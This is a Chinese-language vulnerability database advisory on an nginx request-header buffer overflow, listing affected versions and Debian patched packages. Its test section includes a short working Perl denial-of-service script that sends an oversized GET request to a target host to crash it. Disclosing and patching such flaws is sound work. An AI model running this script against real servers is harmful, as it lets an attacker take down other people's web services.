ZeroBox Vulnerability Database

影响系统
Igor Sysoev nginx 0.7.61
Igor Sysoev nginx 0.7
Igor Sysoev nginx 0.6.38
Igor Sysoev nginx 0.6.32
Igor Sysoev nginx 0.6
Igor Sysoev nginx 0.5.37
Igor Sysoev nginx 0.5
Igor Sysoev nginx 0.4.14
Igor Sysoev nginx 0.4.13
Igor Sysoev nginx 0.4
 
不受影响系统
 
危害
远程攻击者可以利用漏洞使服务程序崩溃。
 
攻击所需条件
攻击者必须访问nginx。
 
漏洞信息
nginx是一款高性能的HTTP和反向代理服务器。
nginx ‘ngx_http_process_request_headers()’存在一个缓冲区溢出，远程攻击者可以利用漏洞使服务程序崩溃。
提交恶意GET请求可触发此漏洞。
 
测试方法
#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => ’80’,
Proto => ‘tcp’);
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";
while(<$sock>) {
print;
}
 
厂商解决方案
用户可升级到最新版本：
Debian Linux 4.0 arm
Debian nginx_0.4.13-2+etch3_arm.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_arm.deb
Debian Linux 5.0 ia-64
Debian nginx_0.6.32-3+lenny3_ia64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_ia64.deb
Debian Linux 4.0 powerpc
Debian nginx_0.4.13-2+etch3_powerpc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_powerpc.deb
Debian Linux 5.0 alpha
Debian nginx_0.6.32-3+lenny3_alpha.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_alpha.deb
Debian Linux 5.0 ia-32
Debian nginx_0.6.32-3+lenny3_i386.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_i386.deb
Debian Linux 5.0 s/390
Debian nginx_0.6.32-3+lenny3_s390.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_s390.deb
Debian Linux 5.0 mipsel
Debian nginx_0.6.32-3+lenny3_mipsel.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_mipsel.deb
Debian Linux 4.0 amd64
Debian nginx_0.4.13-2+etch3_amd64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_amd64.deb
Debian Linux 4.0 ia-32
Debian nginx_0.4.13-2+etch3_i386.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_i386.deb
Debian Linux 5.0 hppa
Debian nginx_0.6.32-3+lenny3_hppa.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_hppa.deb
Debian Linux 4.0 hppa
Debian nginx_0.4.13-2+etch3_hppa.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_hppa.deb
Debian Linux 4.0 sparc
Debian nginx_0.4.13-2+etch3_sparc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_sparc.deb
Debian Linux 4.0 s/390
Debian nginx_0.4.13-2+etch3_s390.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_s390.deb
Debian Linux 5.0 arm
Debian nginx_0.6.32-3+lenny3_arm.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_arm.deb
Debian Linux 4.0 alpha
Debian nginx_0.4.13-2+etch3_alpha.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_alpha.deb
Debian Linux 5.0 armel
Debian nginx_0.6.32-3+lenny3_armel.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_armel.deb
Debian Linux 5.0 amd64
Debian nginx_0.6.32-3+lenny3_amd64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_amd64.deb
Debian Linux 4.0 mipsel
Debian nginx_0.4.13-2+etch3_mipsel.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_mipsel.deb
Debian Linux 5.0 mips
Debian nginx_0.6.32-3+lenny3_mips.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_mips.deb
Debian Linux 5.0 powerpc
Debian nginx_0.6.32-3+lenny3_powerpc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_powerpc.deb
Debian Linux 4.0 ia-64
Debian nginx_0.4.13-2+etch3_ia64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_ia64.deb
Debian Linux 4.0 mips
Debian nginx_0.4.13-2+etch3_mips.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch3_mips.deb
Debian Linux 5.0 sparc
Debian nginx_0.6.32-3+lenny3_sparc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny3_sparc.deb
 
漏洞提供者
Jasson Bell